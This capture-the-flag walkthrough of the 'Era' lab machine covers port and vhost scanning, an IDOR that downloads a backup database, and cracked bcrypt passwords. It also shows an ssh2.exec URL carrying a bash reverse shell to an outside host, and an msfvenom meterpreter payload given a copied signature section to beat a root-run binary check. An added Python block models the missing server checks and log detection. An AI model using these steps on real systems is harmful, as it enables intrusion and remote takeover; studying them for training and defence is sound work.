nmap scan
└─$ nmap -p- --min-rate 1000 -T4 10.129.137.201 -oA nmapfullscan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-27 21:19 EDT
Warning: 10.129.137.201 giving up on port because retransmission cap hit (6).
Stats: 0:00:41 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 30.47% done; ETC: 21:21 (0:01:13 remaining)
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Stats: 0:01:08 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 50.06% done; ETC: 21:21 (0:00:58 remaining)
Nmap scan report for 10.129.137.201
Host is up (0.43s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 157.41 seconds
ffuf vhost scan
ffuf -w /home/kali/Desktop/Info/SecLists-master/SecLists-master/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://era.htb/ -H 'Host: FUZZ.era.htb'
dirsearch page scan
dirsearch -u http://file.era.htb/
Register an account and log in
IDOR to steal the backup
http://file.era.htb/download.php?id=54&dl=true
http://file.era.htb/download.php?id=150&dl=true
We pull down the sqlite3 DB file.
Offline password cracking
$2y$10$S9EOSDqF1RzNUvyVj7OtJ.mskgP1spN3g2dneU.D.ABQLhSV2Qvxm:america
$2b$12$HkRKUdjjOdf2WuTXovkHIOXwVDfSrgCqqHPpE37uWejRqUWqwEL2.:mustang
The credentials from the backup database do not let us log in, so we modify the security question answers instead.
SSH2 + SSRF = RCE
Log in as admin_ef01cab31aa
Analysing the source shows that the fopen call is vulnerable: as long as we hold an administrator account, we control the argument passed to fopen.
So we can try using the account credentials to execute a command.
http://file.era.htb/download.php?id=6785&show=true&format=ssh2.exec://eric:america@127.0.0.1:22/bash+-i+>%26+/dev/tcp/10.10.16.3/9001+0>%261;
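As an added illustration (not the Era application's code and not part of the original writeup), the Python below models the two server-side checks whose absence the IDOR section and the fopen section above rely on: an ownership check on `id`, and an allowlist on `format` that refuses any stream-wrapper scheme before it could reach fopen, together with a log scanner that flags both patterns in web access logs. The allowlist, the ownership table, the enumeration threshold and the sample log lines are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

ALLOWED_FORMATS = {"raw", "txt"}                    # assumed legitimate values
WRAPPER_RE = re.compile(r"^[a-z0-9.+-]+://", re.I)   # any "scheme://" prefix
ID_ENUM_THRESHOLD = 5                               # distinct ids per client

# Constructed ownership table (file id -> owning account); not real data.
FILE_OWNERS = {54: "admin", 150: "admin", 6785: "alice"}


def check_download(user, query):
    """Server-side validation of download.php parameters.

    Returns 'ok' or the reason the request must be refused.
    """
    params = parse_qs(query)
    try:
        file_id = int(params.get("id", [""])[0])
    except ValueError:
        return "bad id"
    if FILE_OWNERS.get(file_id) != user:        # the missing IDOR check
        return "not owner"
    fmt = params.get("format", ["raw"])[0]
    # A scheme prefix means a PHP stream wrapper; only allowlisted names reach fopen.
    if WRAPPER_RE.match(fmt) or fmt not in ALLOWED_FORMATS:
        return "bad format"
    return "ok"


def scan_access_log(lines):
    """Return (client, reason) alerts from 'client METHOD path' log lines."""
    alerts, ids_seen = [], defaultdict(set)
    for line in lines:
        client, _, path = line.split(" ", 2)
        params = parse_qs(urlsplit(path).query)
        fmt = params.get("format", [""])[0]
        if WRAPPER_RE.match(fmt):
            alerts.append((client, "wrapper in format: " + fmt.split("://", 1)[0]))
        for file_id in params.get("id", []):
            ids_seen[client].add(file_id)
    for client, ids in ids_seen.items():        # many distinct ids from one client
        if len(ids) >= ID_ENUM_THRESHOLD:
            alerts.append((client, "id enumeration: %d distinct ids" % len(ids)))
    return alerts


# Constructed sample log lines modelled on the requests shown in this writeup.
SAMPLE_LOG = ["10.0.0.7 GET /download.php?id=%d&dl=true" % i
              for i in (54, 55, 56, 150, 151)]
SAMPLE_LOG += ["10.0.0.7 GET /download.php?id=6785&show=true&format=ssh2.exec://redacted",
               "10.0.0.9 GET /download.php?id=6785&show=true&format=txt"]
```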
objcopy: bypassing the file self-check
Run linpeas.sh to enumerate
Run pspy64 to monitor scheduled tasks
The monitor file is writable by us, so we generate a shell payload.
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.16.3 LPORT=9001 -f elf -o reverse.elf
Transfer it to the target machine, then extract monitor's signature (replacing the file directly seems to stop monitor from running, so we suspect there is a check).
# extract monitor's signature section
objcopy --dump-section .text_sig=sig monitor
# add monitor's signature section to the malicious file
objcopy --add-section .text_sig=sig reverse.elf
Start the msf listener, then copy the bypassed malicious file over monitor.
cp reverse.elf monitor
Finally we get a shell.